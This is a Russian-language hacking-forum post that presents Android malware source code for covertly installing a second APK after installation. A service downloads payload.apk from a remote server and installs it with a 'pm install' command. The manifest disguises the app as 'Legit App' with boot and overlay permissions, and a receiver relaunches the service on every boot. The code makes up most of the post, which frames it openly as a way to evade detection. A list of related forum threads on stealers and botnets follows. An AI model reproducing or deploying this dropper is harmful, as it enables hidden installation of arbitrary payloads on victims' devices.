Статья Скрытая установка вредоносных APK в Android через сервис загрузки

devqp

Специалист
Техника минимизации обнаружения вредоносных приложений через отложенную загрузку payload после установки. Основные элементы реализации:

1. Загрузка и установка дополнительного APK
Сервис скачивает файл с удаленного сервера и устанавливает его через системную команду:
Код:
// MaliciousService.java
package com.example.maliciousapp;

import android.app.IntentService;
import android.content.Intent;
import java.io.BufferedInputStream;
import java.io.FileOutputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public class MaliciousService extends IntentService {
    public MaliciousService() {
        super("MaliciousService");
    }

    @Override
    protected void onHandleIntent(Intent intent) {
        try {
            URL url = new URL("https://example.com/payload.apk");
            HttpURLConnection connection = (HttpURLConnection) url.openConnection();
            connection.connect();
            
            BufferedInputStream input = new BufferedInputStream(connection.getInputStream());
            FileOutputStream output = openFileOutput("payload.apk", MODE_PRIVATE);
            
            byte[] data = new byte[1024];
            int count;
            while ((count = input.read(data)) != -1) {
                output.write(data, 0, count);
            }
            
            input.close();
            output.close();
            connection.disconnect();
            
            Runtime.getRuntime().exec("pm install -r " + getFilesDir().getPath() + "/payload.apk");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

2. Маскировка под легитимное приложение
Использование стандартных иконок и безобидных названий в манифесте:
Код:
<!-- AndroidManifest.xml -->
<manifest package="com.example.maliciousapp">
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />

    <application
        android:icon="@drawable/ic_launcher"
        android:label="Legit App">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <service android:name=".MaliciousService" />
        <receiver android:name=".BootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
    </application>
</manifest>

3. Автозапуск при загрузке устройства
BroadcastReceiver активирует сервис после получения системного события:
Код:
// BootReceiver.java
package com.example.maliciousapp;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

public class BootReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        if (Intent.ACTION_BOOT_COMPLETED.equals(intent.getAction())) {
            Intent serviceIntent = new Intent(context, MaliciousService.class);
            context.startService(serviceIntent);
        }
    }
}

Ключевые аспекты:
- Запрос разрешений WRITE_EXTERNAL_STORAGE и RECEIVE_BOOT_COMPLETED для фоновой работы
- Исполнение системной команды pm install для автоматической установки
- Скрытие вредоносной функциональности за активностью с LAUNCHER категорией
 
Похожие темы
Admin Интересно Скрытая экономика вымогательства на основе открытых баз данных. Новости в сети 0
Support81 Скрытая сеть слежки в 11 странах: Insikt раскрывает клиентов суперсекретного шпионского ПО Predator Новости в сети 0
T Скрытая сборка RMS 2018 Готовый софт 11
K Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф Уязвимости и взлом 0
S Скрытая подписка на группу вк Фишинг, мошенничество, СИ 9
impak Скрытая RMS сборка 2017. (Пропатченная) Готовый софт 3
M Скрытая сборка RMS с подкачкой файлов с сервера 2 Готовый софт 5
Admin Скрытая сборка RMS почти 2017 с отправкой ID на почту(Слито) Вирусология 33
Admin Интересно Пиво из воздуха: установка всасывает CO₂ из атмосферы и очищает его до 99,999%. Новости в сети 0
DOMINUS Удаленная установка защищенной Asguard OS с криптошифрованием Ищу работу. Предлагаю свои услуги. 4
R Установка языковый пакет на kali linux persistence Свободное общение 0
Y Установка и настройка OpenVPN сервера на windows Полезные статьи 2
G Заработок Просто установка браузера Способы заработка 3
T установка Kali linux 2020.1b Свободное общение 1
Z Установка AnyDesk в Ubuntu 14.04 Свободное общение 2
B Установка и настройка Jabber клиента Анонимность и приватность 0
× ProxyBroker Особенности | Установка Готовый софт 1
A Incentive Traffic (Мотивированный трафик) (Установка приложений) Трафик: загрузки, инсталы, ads 0
T [Копипаст] Mirai ботнет (установка-настройка) Раздачи и сливы 2
1 Установка и распространение Azorult Stealer Готовый софт 10
T Установка и настройка базовой безопасности TrueCrypt Готовый софт 0
M Установка двух и более ОС на флешку. Уязвимости и взлом 2
G Снятие ограничения на музыку VK, или установка версии 2.15.3? Свободное общение 6
M Установка DDoS скрипта на машину. Полезные статьи 0
C Установка и настройка ОС Whonix. Анонимность и приватность 1
I Установка Nvidia CUDA драйверов на kali linux Полезные статьи 0
S Установка и настройка ОС Whonix Анонимность и приватность 2
M Cythosia v2 настройка и установка Полезные статьи 0
Admin UFOLABSNEWS Новая версия вредоносного ПО MacSync использует календари iCloud для доставки вредоносных модулей. Новости в сети 0
Admin UFOLABSNEWS 13 вредоносных пакетов на Packagist атакуют уязвимые iPhone для кражи криптокошельков. Новости в сети 0
Admin UFOLABSNEWS Сервис Cruciferra используется для скрытия вредоносных атак по всему миру. Новости в сети 0
Admin UFOLABSNEWS Обнаружено 222 вредоносных репозитория на GitHub. Новости в сети 0
Admin UFOLABSNEWS GitHub Copilot обходит защиту от вредоносных запросов при написании кода. Новости в сети 0
Admin UFOLABSNEWS Исследователь проанализировал 3000 вредоносных нагрузок ClickFix, раскрыв API-управляемую доставку вредоносного ПО. Новости в сети 0
Admin UFOLABSNEWS Администраторы сайтов сообщают о росте числа вредоносных ботов, выдающих себя за Googlebot. Новости в сети 0
Admin UFOLABSNEWS Полиция ликвидировала сеть распространения вредоносных программ Amadey и StealC, восстановив 27 млн украденных учетных данных. Новости в сети 0
Admin UFOLABSNEWS Обнаружено 10 000 вредоносных репозиториев на GitHub, нацеленных на разработчиков и ИИ-агентов. Новости в сети 0
Admin Интересно Искусственный интеллект ускоряет создание вредоносных инструментов. Новости в сети 0
Admin Интересно RubyGems временно приостановил регистрацию новых пользователей из-за сотен вредоносных пакетов. Новости в сети 0
Admin Интересно В Google Play обнаружены десятки вредоносных приложений для Android. Новости в сети 0
Admin Интересно Microsoft предупреждает о вредоносных VBS-файлах, распространяемых через WhatsApp. Новости в сети 0
Admin Интересно Злоумышленники используют GitHub для распространения вредоносных ссылок. Новости в сети 0
Admin Интересно Разработчики становятся жертвами вредоносных программ под видом тестовых заданий. Новости в сети 0
Admin Интересно Interpol ликвидировал 45 тысяч вредоносных сайтов в ходе глобальной операции. Новости в сети 0
Admin Интересно Исследователи обнаружили сотни вредоносных рекламных кампаний на платформах Meta. Новости в сети 0
El_IRBIS Проверка маршрутизатора на наличие вредоносных программ: полное руководство Вирусология 0
Support81 В ходе операции Synergia отключено более 1300 вредоносных C&C-серверов Новости в сети 0
ev0117434 Интересно Создание вредоносных QR-кодов для взлома телефонов и других устройств Уязвимости и взлом 11
M RogueKiller - обнаружение вредоносных процессов Анонимность и приватность 0
G QuickSand — делаем анализ подозрительных вредоносных документов Готовый софт 0

Название темы